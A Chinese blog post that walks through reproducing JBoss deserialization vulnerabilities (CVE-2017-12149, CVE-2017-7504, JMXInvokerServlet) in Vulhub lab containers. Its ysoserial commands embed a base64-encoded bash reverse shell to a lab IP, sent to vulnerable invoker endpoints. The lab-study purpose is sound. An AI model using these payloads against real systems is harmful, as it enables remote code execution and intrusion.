vulhub漏洞复现79_Jboss

最新推荐文章于 2024-08-15 09:37:32 发布
最新推荐文章于 2024-08-15 09:37:32 发布
阅读量1.6k 收藏
点赞数
文章标签: java 开发语言 后端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122968568
版权

前言

Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

一、 CVE-2017-12149_JBoss 5.x/6.x 反序列化漏洞

漏洞详情

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

测试环境

靶场:192.168.4.10_ubuntu

#docker-compose up -d

首次执行时会有1~3分钟时间初始化,初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面。

漏洞复现

1. 编写反弹shell的命令

我们使用bash来反弹shell,但由于`Runtime.getRuntime().exec()`中不能使用管道符等bash需要的方法,我们需要用进行一次编码。

工具:http://www.jackson-t.ca/runtime-exec-payloads.html

 

2. 序列化数据生成

 

使用[ysoserial](https://github.com/frohoff/ysoserial)来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:

```

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQuMjkvOTk5OSAwPiYxCg==}|{base64,-d}|{bash,-i} " > poc.ser

```

3. 发送POC

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:

 成功反弹shell:

 

二、 CVE-2017-7504_ JBoss 4.x JBossMQ JMS 反序列化漏洞

漏洞详情

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

参考:

- https://github.com/joaomatosf/JavaDeserH2HC

- https://www.youtube.com/watch?v=jVMr4eeJ2Po

漏洞环境

执行如下命令启动JBoss AS 4.0.5:

#docker-compose up -d

环境启动后,目标为`http://your-ip:8080`。

漏洞复现

该漏洞出现在`/jbossmq-httpil/HTTPServerILServlet`请求中,同上,我们借助ysoserial的eCommonsCollections5利用链来复现。生成Payload:

```

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQuMjkvOTk5OSAwPiYxCg==}|{base64,-d}|{bash,-i}" > 1.ser

```

 我们将1.ser文件内容作为POST Body发送:

 执行`docker-compose exec jboss bash`进入容器,可见`/tmp/success`已成功创建。

 

三、 JBoss JMXInvokerServlet 反序列化漏洞

漏洞详情

这是经典的JBoss反序列化漏洞,JBoss在`/invoker/JMXInvokerServlet`请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

参考文档:

-https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

- https://www.seebug.org/vuldb/ssvid-89723

 - http://www.freebuf.com/sectool/88908.html

 - https://paper.seebug.org/312/

漏洞环境

#docker-compose up -d

首次执行时会有1~3分钟时间初始化,初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面。

漏洞复现

JBoss在处理`/invoker/JMXInvokerServlet`请求的时候读取了对象,所以我们直接将[ysoserial](https://github.com/frohoff/ysoserial)生成好的POC附在POST Body中发送即可。整个过程可参考[jboss/CVE-2017-12149](https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149),我就不再赘述。

 获取shell

Revenge_scan
关注
[ vulhub漏洞复现篇 ] Jboss_JMXInvokerServlet_Deserialization(反序列化)代码执行漏洞
qq_51577576的博客
09-15 1146
Jboss_JMXInvokerServlet_Deserialization代码执行漏洞漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
[ vulhub漏洞复现篇 ] JBOSS AS 4.x以下反序列化远程代码执行漏洞CVE-2017-7504
qq_51577576的博客
09-01 1123
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
vulhub漏洞复现
qq_30854761的博客
04-26 4199
下载镜像 1 docker pull medicean/vulapps:s_shiro_1 直接运行镜像,将docker的8080端口映射到本地的 8080上 1 docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1 获取复现需要用到的ysoserial工具 若无mvn则自行下载安装 1 2 3 git clone..
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1648
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
最新发布
baimao__Ch的博客
08-15 870
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
热门推荐
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
vulhub漏洞复现1
xhscxj的博客
05-23 1993
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2702
vulhub-spring漏洞复现
[ vulhub漏洞复现篇 ] JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149
qq_51577576的博客
08-31 1085
JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149 该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。...
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
weixin_54626591的博客
05-06 266
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
Vulhub】CVE-2017-7504 JBOSS反序列化漏洞复现
看不尽的尘埃——博客
02-07 9071
环境 目标(Kali):http://192.168.0.11:8080/ 操作机(Paroot):192.168.0.131     过程 CVE-2017-12149和CVE-2017-7504都是反序列化漏洞,因此用的东西都是一样的,笔者这里使用上次复现CVE-2017-12149的时候的POC文件。 笔者还特别查了下两种区别: CVE-2017-7504 影响范围...
Vulhub漏洞复现
weixin_45995579的博客
09-30 1787
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
vulhub靶场Webmin(CVE-2019-15107)漏洞复现
weixin_45095113的博客
12-12 837
Webmin(CVE-2019-15107)漏洞复现
vulhub漏洞复现-Nginx
遇事不决冲冲冲
10-28 4956
Nginx nginx是一个高性能的HTTP和反向代理web服务器。 思路 在关闭了pathinfo的情况下,只有.php后缀的文件才会被发送给fastcgi解析。 而存在CVE-2013-4547的情况下,我们请求1.gif[0x20][0x00].php,这个URI可以匹配上正则\.php$,可以进入这个Location块;但进入后,Nginx却错误地认为请求的文件是1.gif[0x20],就设置其为SCRIPT_FILENAME的值发送给fastcgi,而Fastcgi根据SCRIPT_FILENAM
Vulhub复现fastison漏洞
weixin_64655821的博客
11-08 1571
Vulhub复现fastison漏洞
vulhub漏洞复现66_Spring
weixin_44193247的博客
02-13 1153
vulhub漏洞复现练习篇
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 730
vulhub漏洞复现-jboss反序列化漏洞
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 986
vulhub漏洞复现练习篇
vulhub靶场】Tomcat中间件漏洞复现
M372109150的博客
05-04 2546
本文主要是对tomcat中间件相关漏洞复现,包括Tomcat AJP 任意文件读取/包含漏洞 (CVE-2020-1938)、Tomcat 任意文件写入漏洞 (CVE-2017-12615)以及Tomcat 弱密码和后端 Getshell 漏洞
Struts与JBoss安全漏洞修复详解与防范措施
本文档主要关注于JBoss与Struts框架中的两个关键漏洞的修复方案,即Apache Struts 2的远程命令执行漏洞和开放重定向漏洞。Struts2是一个流行的Java企业级Web应用框架,因其MVC架构而被广泛应用。这两个漏洞的存在,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值